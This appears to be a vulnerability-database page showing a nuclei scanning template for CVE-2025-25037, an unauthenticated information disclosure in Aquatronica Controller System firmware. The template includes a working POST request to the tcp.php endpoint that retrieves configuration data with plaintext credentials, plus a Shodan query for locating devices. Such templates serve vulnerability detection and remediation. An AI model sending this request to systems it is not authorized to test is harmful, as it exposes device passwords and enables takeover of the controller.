Lucene search
K

Aquatronica Controller System <= 5.1.6 - Information Disclosure

🗓️ 07 Jul 2026 03:01:27Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 17 Views

Unauthenticated tcp.php access exposes credentials and config in Aquatronica Controller System firmware 5.1.6 and earlier.

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2025-25037
20 Jun 202522:02
circl
CNNVD
Aquatronica Controller System 安全漏洞
20 Jun 202500:00
cnnvd
CVE
CVE-2025-25037
20 Jun 202518:35
cve
Cvelist
CVE-2025-25037 Aquatronica Controller System Complete Information Disclosure
20 Jun 202518:35
cvelist
EUVD
EUVD-2025-18781
3 Oct 202520:07
euvd
NVD
CVE-2025-25037
20 Jun 202519:15
nvd
Positive Technologies
PT-2025-26455
20 Jun 202500:00
ptsecurity
RedhatCVE
CVE-2025-25037
23 Jun 202508:39
redhatcve
VulnCheck KEV
VulnCheck KEV: CVE-2025-25037
20 Jun 202500:00
vulncheck_kev
Vulnrichment
CVE-2025-25037 Aquatronica Controller System Complete Information Disclosure
20 Jun 202518:35
vulnrichment
Rows per page
id: CVE-2025-25037

info:
  name: Aquatronica Controller System <= 5.1.6 - Information Disclosure
  author: s4e-io
  severity: high
  description: |
    Aquatronica Controller System firmware 5.1.6 and earlier and web interface 2.0 and earlier contain an information disclosure vulnerability caused by unauthenticated access to tcp.php endpoint, letting remote attackers retrieve sensitive configuration data including plaintext credentials, exploit requires no authentication.
  impact: |
    Unauthenticated attackers can retrieve sensitive configuration data including plaintext credentials through the tcp.php endpoint, potentially gaining full administrative access to the controller system.
  remediation: |
    Upgrade to Aquatronica Controller System firmware version 5.1.7 or later and web interface version 2.1 or later that implements proper authentication controls.
  reference:
    - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5824.php
    - https://www.exploit-db.com/exploits/52028
    - https://vulncheck.com/advisories/aquatronica-controller-system-credential-leak
    - https://nvd.nist.gov/vuln/detail/CVE-2025-25037
  classification:
    cvss-metrics: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:H/SI:H/SA:H
    cve-id: CVE-2025-25037
    cwe-id: CWE-200
    epss-score: 0.01443
    epss-percentile: 0.70053
  metadata:
    verified: true
    max-request: 1
    vendor: aquatronica
    product: controller
    shodan-query: html:"aquatronica"
  tags: cve,cve2025,aquatronica,info-leak,vkev,vuln

http:
  - raw:
      - |
        POST /tcp.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        function_id=tcp_xml_request&command=WS_GET_NETWORK_CFG

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "WEB_PASSWORD"
          - "pwd=&quot;"
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100aaef9e4490a935ae9e36d2ebbca2e838a241f34f326fc4dc79688959e0fcc70a0220708f6379bc798a71faf94f78141ad3941c7e71c793a432fb51ad7714a2ac8c24:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation